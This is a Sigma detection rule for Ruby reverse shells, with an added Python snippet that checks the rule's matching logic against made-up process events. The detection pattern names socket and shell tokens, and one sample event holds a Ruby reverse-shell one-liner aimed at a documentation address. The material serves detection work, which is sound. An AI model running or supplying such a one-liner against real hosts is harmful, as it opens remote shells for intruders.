Potential Ruby Reverse Shell

Detects execution of ruby with the "-e" flag together with calls to "socket"-related functions. This combination could indicate an attempt to set up a reverse shell.

Sigma rule

```yaml
title: Potential Ruby Reverse Shell
id: b8bdac18-c06e-4016-ac30-221553e74f59
status: test
description: Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to set up a reverse shell
references:
    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
    - https://www.revshells.com/
author: '@d4ns4n_'
date: 2023/04/07
tags:
    - attack.execution
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        Image|contains: 'ruby'
        CommandLine|contains|all:
            - ' -e'
            - 'rsocket'
            - 'TCPSocket'
        CommandLine|contains:
            - ' ash'
            - ' bash'
            - ' bsh'
            - ' csh'
            - ' ksh'
            - ' pdksh'
            - ' sh'
            - ' tcsh'
    condition: selection
falsepositives:
    - Unknown
level: medium
```
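To see what the selection above actually requires of an event, here is an added example (not code from the Sigma rule or the SigmaHQ project) that re-implements just the three matchers this rule uses and runs them over a few constructed process_creation events; the events, the 192.0.2.10 documentation address and the file paths are all made up for the demonstration.

```python
# Added example, not part of the Sigma rule or SigmaHQ. It evaluates this
# rule's 'selection' against constructed process_creation events. Only the
# matchers the rule uses are implemented: Image|contains, CommandLine|contains|all
# (AND) and a CommandLine|contains list (OR), case-insensitive as Sigma defaults.

IMAGE_CONTAINS = "ruby"
CMDLINE_CONTAINS_ALL = [" -e", "rsocket", "TCPSocket"]
CMDLINE_CONTAINS_ANY = [" ash", " bash", " bsh", " csh", " ksh",
                        " pdksh", " sh", " tcsh"]


def _contains(haystack: str, needle: str) -> bool:
    """Sigma 'contains' is a case-insensitive substring test (no |cased here)."""
    return needle.lower() in haystack.lower()


def matches(event: dict) -> bool:
    """True when an event satisfies every field of the rule's 'selection'."""
    image = event.get("Image", "")
    cmd = event.get("CommandLine", "")
    return (
        _contains(image, IMAGE_CONTAINS)
        and all(_contains(cmd, n) for n in CMDLINE_CONTAINS_ALL)
        and any(_contains(cmd, n) for n in CMDLINE_CONTAINS_ANY)
    )


# Constructed sample events, not real telemetry. 192.0.2.10 is a documentation
# address; the first command line only carries the tokens the rule keys on.
SAMPLE_EVENTS = [
    {"Image": "/usr/bin/ruby",
     "CommandLine": "ruby -rsocket -e 'c=TCPSocket.new(\"192.0.2.10\",4444);"
                    "exec(\"/usr/bin/env bash -i\")'"},
    # -rsocket without -e: the code comes from a file, so the rule stays quiet
    {"Image": "/usr/bin/ruby",
     "CommandLine": "ruby -rsocket /opt/app/healthcheck.rb"},
    # -e without any socket use: no match
    {"Image": "/usr/bin/ruby",
     "CommandLine": "ruby -e 'puts 1 + 1'"},
    # all command-line tokens present, but the Image gate fails
    {"Image": "/usr/bin/python3",
     "CommandLine": "python3 -c 'print(\"ruby -rsocket -e TCPSocket bash\")'"},
]


def alerting_command_lines(events=SAMPLE_EVENTS) -> list:
    """Command lines from `events` that would raise this rule."""
    return [e["CommandLine"] for e in events if matches(e)]
```

Note that every entry in the shell list starts with a space, so the selection needs the shell name to appear as a separate token on the command line, not only as part of a path such as /bin/sh.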
